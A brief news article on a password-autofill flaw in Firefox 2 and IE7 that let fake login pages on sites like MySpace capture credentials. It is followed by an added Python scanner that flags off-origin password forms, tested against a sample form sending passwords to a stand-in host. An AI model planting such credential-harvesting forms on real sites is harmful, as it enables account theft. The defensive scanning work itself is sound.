Firefox 2 and Internet Explorer 7 plagued by Security Bugs
A security flaw christened the Reverse Cross Site Request Vulnerability (RCSR) by Robert Chapin, who discovered it, can become a handy weapon for hackers seeking usernames and passwords. The main culprit behind this security breach is that neither Firefox nor IE performs crucial checks on the destination server, the location to which the password is forwarded.
In Firefox's case, the main culprit is its Password Manager software. This software automatically fills the username and password into another login page, which enables a hacker to create a false login page to obtain usernames and passwords.
Sites like MySpace, a social networking site, also experienced this security threat in late October. Sites that incorporate user-made pages such as blogs and forums are more vulnerable to these types of flaws. In the MySpace case, the hacker registered a username with the site and then used it to host a fake login page. Users who then visited MySpace through Firefox had their confidential information captured. Despite such an incident on such a well-known, reliable site, Firefox has not come up with any safeguards. A bug report has been filed by Mozilla, though no stable solution has yet been developed. IT security experts and software solution teams have also suggested that Firefox's Password Manager should be replaced with the Master Password Timeout extension to lock the master security device after a specific period of idleness.
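The missing destination check described above, written out as a scan that a site hosting user-made pages could run over submitted HTML: it lists every form that contains a password field and whose submit target leaves the page's own origin. This is an added example, not code from the original article, Mozilla or Microsoft; the hostnames social.example and collector.example and all function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """Return (scheme, host, port) so two URLs can be compared by origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)

class PasswordFormScanner(HTMLParser):
    """Record the submit target of every <form> that holds a password field."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.action = None          # resolved action of the open form, if any
        self.has_password = False
        self.targets = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.finish_form()      # a new <form> implicitly ends an unclosed one
            # An absent or empty action submits back to the page itself.
            action = (attrs.get("action") or "").strip()
            self.action = urljoin(self.page_url, action)
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = self.action is not None

    def handle_endtag(self, tag):
        if tag == "form":
            self.finish_form()

    def finish_form(self):
        if self.action is not None and self.has_password:
            self.targets.append(self.action)
        self.action, self.has_password = None, False

def off_origin_password_forms(page_url, html):
    """Return submit targets of password forms that leave the page's origin."""
    scanner = PasswordFormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    scanner.finish_form()           # markup may omit </form> entirely
    return [t for t in scanner.targets if origin(t) != origin(page_url)]

# Constructed sample: a user-made page on a hypothetical site, social.example.
PAGE_URL = "https://social.example/profiles/user123"
USER_HTML = ('<form method="post" action="https://collector.example/save">'
             '<input name="user"><input type="password" name="pass"></form>')
```

The scan looks only at the form's action attribute, so it is a starting point for reviewing user-supplied markup rather than a complete filter.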
Source: http://www.earthtimes.org/articles/show/10807.html